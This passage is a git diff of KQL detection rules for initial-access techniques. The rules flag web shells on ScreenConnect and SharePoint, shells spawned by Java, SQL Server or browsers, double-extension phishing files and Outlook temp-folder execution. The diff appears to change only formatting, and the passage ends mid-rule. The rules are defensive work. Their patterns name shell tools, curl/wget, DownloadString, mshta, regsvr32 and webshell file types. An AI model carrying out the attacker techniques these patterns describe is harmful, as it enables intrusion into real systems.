Access/remote_access_tool_screenconnect_server_web_shell_execution.kql b/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql index 7ab0fb11..f2a05efe 100644 --- a/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql +++ b/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - ScreenConnect Server Web Shell Execution -// Author: Jason Rathbun (Blackpoint Cyber) -// Date: 2024-02-26 -// Level: high -// Description: Detects potential web shell execution from the ScreenConnect server process. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Remote Access Tool - ScreenConnect Server Web Shell Execution +// Author: Jason Rathbun (Blackpoint Cyber) +// Date: 2024-02-26 +// Level: high +// Description: Detects potential web shell execution from the ScreenConnect server process. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql b/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql index a78e1886..6f0b3b69 100644 --- a/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql +++ b/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql @@ -1,10 +1,10 @@ -// Title: Running Chrome VPN Extensions via the Registry 2 VPN Extension -// Author: frack113 -// Date: 2021-12-28 -// Level: high -// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.persistence, attack.t1133 - -DeviceRegistryEvents +// Title: Running Chrome VPN Extensions via the Registry 2 VPN Extension +// Author: frack113 +// Date: 2021-12-28 +// Level: high +// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.t1133 + +DeviceRegistryEvents | where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains "inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains "hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp") \ No newline at end of file diff --git a/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql b/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql index 6c1c13cf..25e4e948 100644 --- a/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql +++ b/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql @@ -1,13 +1,13 @@ -// Title: Shell Process Spawned by Java.EXE -// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali -// Date: 2021-12-17 -// Level: medium -// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation -// False Positives: -// - Legitimate calls to system binaries -// - Company specific internal usage - -DeviceProcessEvents +// Title: Shell Process Spawned by Java.EXE +// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali +// Date: 2021-12-17 +// Level: medium +// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate calls to system binaries +// - Company specific internal usage + +DeviceProcessEvents | where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build"))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql b/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql index 4d6b1c5f..384b570f 100644 --- a/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql +++ b/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Browser Child Process - MacOS -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-04-05 -// Level: medium -// Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.t1189, attack.t1203, attack.t1059 -// False Positives: -// - Legitimate browser install, update and recovery scripts - -DeviceProcessEvents +// Title: Suspicious Browser Child Process - MacOS +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-04-05 +// Level: medium +// Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1189, attack.t1203, attack.t1059 +// False Positives: +// - Legitimate browser install, update and recovery scripts + +DeviceProcessEvents | where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/osascript" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/pwsh" or FolderPath endswith "/python" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/wget" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath contains "com.apple.WebKit.WebContent" or InitiatingProcessFolderPath contains "firefox" or InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome" or InitiatingProcessFolderPath contains "Microsoft Edge" or InitiatingProcessFolderPath contains "Opera" or InitiatingProcessFolderPath contains "Safari" or InitiatingProcessFolderPath contains "Tor Browser")) and (not(((((ProcessCommandLine contains "/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/" and ProcessCommandLine contains "/Resources/install.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_preflight.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_postflight.sh")) and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Application Support/Google/Chrome/recovery/" and ProcessCommandLine contains "/ChromeRecovery") and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ProcessCommandLine contains "--defaults-torrc" or ProcessCommandLine =~ "*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*" or ((ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "hw.model") and InitiatingProcessFolderPath contains "Microsoft Edge")))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql b/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql index 685c4387..2ba63c98 100644 --- a/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql +++ b/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Child Process Of SQL Server -// Author: FPT.EagleEye Team, wagga -// Date: 2020-12-11 -// Level: high -// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. -// MITRE Tactic: Initial Access -// Tags: attack.t1505.003, attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation - -DeviceProcessEvents +// Title: Suspicious Child Process Of SQL Server +// Author: FPT.EagleEye Team, wagga +// Date: 2020-12-11 +// Level: high +// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. +// MITRE Tactic: Initial Access +// Tags: attack.t1505.003, attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation + +DeviceProcessEvents | where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\"))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql b/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql index 46b851ed..fb29b870 100644 --- a/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql +++ b/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Child Process Of Veeam Dabatase -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-04 -// Level: critical -// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation - -DeviceProcessEvents +// Title: Suspicious Child Process Of Veeam Dabatase +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: critical +// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation + +DeviceProcessEvents | where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql b/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql index f4bcc899..bf4ad443 100644 --- a/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql +++ b/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Double Extension File Execution -// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-06-26 -// Level: high -// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 - -DeviceProcessEvents +// Title: Suspicious Double Extension File Execution +// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-06-26 +// Level: high +// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".gif.exe" or ProcessCommandLine contains ".jpeg.exe" or ProcessCommandLine contains ".jpg.exe" or ProcessCommandLine contains ".mkv.exe" or ProcessCommandLine contains ".mov.exe" or ProcessCommandLine contains ".mp3.exe" or ProcessCommandLine contains ".mp4.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".png.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".svg.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains ".txt.js" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains "⠀⠀⠀⠀⠀⠀.exe") and (FolderPath endswith " .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.exe" or FolderPath endswith ".docx.js" or FolderPath endswith ".gif.exe" or FolderPath endswith ".jpeg.exe" or FolderPath endswith ".jpg.exe" or FolderPath endswith ".mkv.exe" or FolderPath endswith ".mov.exe" or FolderPath endswith ".mp3.exe" or FolderPath endswith ".mp4.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".pdf.js" or FolderPath endswith ".png.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".rtf.js" or FolderPath endswith ".svg.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith ".txt.js" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".xlsx.js" or FolderPath endswith "⠀⠀⠀⠀⠀⠀.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql b/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql index c04e9c5a..35e2a350 100644 --- a/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql +++ b/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution From Outlook Temporary Folder -// Author: Florian Roth (Nextron Systems) -// Date: 2019-10-01 -// Level: high -// Description: Detects a suspicious program execution in Outlook temp folder -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 - -DeviceProcessEvents +// Title: Suspicious Execution From Outlook Temporary Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-01 +// Level: high +// Description: Detects a suspicious program execution in Outlook temp folder +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 + +DeviceProcessEvents | where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql b/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql index 231e4c26..f247de83 100644 --- a/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql +++ b/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution via macOS Script Editor -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022-10-21 -// Level: medium -// Description: Detects when the macOS Script Editor utility spawns an unusual child process. -// MITRE Tactic: Initial Access -// Tags: attack.t1566, attack.t1566.002, attack.initial-access, attack.t1059, attack.t1059.002, attack.t1204, attack.t1204.001, attack.execution, attack.persistence, attack.t1553, attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious Execution via macOS Script Editor +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-21 +// Level: medium +// Description: Detects when the macOS Script Editor utility spawns an unusual child process. +// MITRE Tactic: Initial Access +// Tags: attack.t1566, attack.t1566.002, attack.initial-access, attack.t1059, attack.t1059.002, attack.t1204, attack.t1204.001, attack.execution, attack.persistence, attack.t1553, attack.defense-evasion + +DeviceProcessEvents | where ((FolderPath endswith "/curl" or FolderPath endswith "/bash" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osascript" or FolderPath endswith "/mktemp" or FolderPath endswith "/chmod" or FolderPath endswith "/php" or FolderPath endswith "/nohup" or FolderPath endswith "/openssl" or FolderPath endswith "/plutil" or FolderPath endswith "/PlistBuddy" or FolderPath endswith "/xattr" or FolderPath endswith "/sqlite" or FolderPath endswith "/funzip" or FolderPath endswith "/popen") or (FolderPath contains "python" or FolderPath contains "perl")) and InitiatingProcessFolderPath endswith "/Script Editor" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql index 6607f99e..590e74ad 100644 --- a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql +++ b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql @@ -1,13 +1,13 @@ -// Title: Suspicious File Created in Outlook Temporary Directory -// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-07-22 -// Level: high -// Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. -// This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 -// False Positives: -// - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments - -DeviceFileEvents +// Title: Suspicious File Created in Outlook Temporary Directory +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-22 +// Level: high +// Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. +// This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments + +DeviceFileEvents | where (FolderPath endswith ".cpl" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".rdp" or FolderPath endswith ".svg" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and ((FolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or FolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\" and FolderPath contains "\\Content.Outlook\\")) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql index c5bf10b1..b820c610 100644 --- a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql +++ b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql @@ -1,11 +1,11 @@ -// Title: Suspicious File Write to SharePoint Layouts Directory -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-07-24 -// Level: high -// Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. -// This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003 - -DeviceFileEvents +// Title: Suspicious File Write to SharePoint Layouts Directory +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-24 +// Level: high +// Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. +// This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003 + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith ".asax" or FolderPath endswith ".ascx" or FolderPath endswith ".ashx" or FolderPath endswith ".asmx" or FolderPath endswith ".asp" or FolderPath endswith ".aspx" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cer" or FolderPath endswith ".config" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".jsp" or FolderPath endswith ".jspx" or FolderPath endswith ".php" or FolderPath endswith ".ps1" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql b/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql index 7ef5fc94..ff5f4e12 100644 --- a/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql +++ b/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql @@ -1,10 +1,10 @@ -// Title: Suspicious HWP Sub Processes -// Author: Florian Roth (Nextron Systems) -// Date: 2019-10-24 -// Level: high -// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, 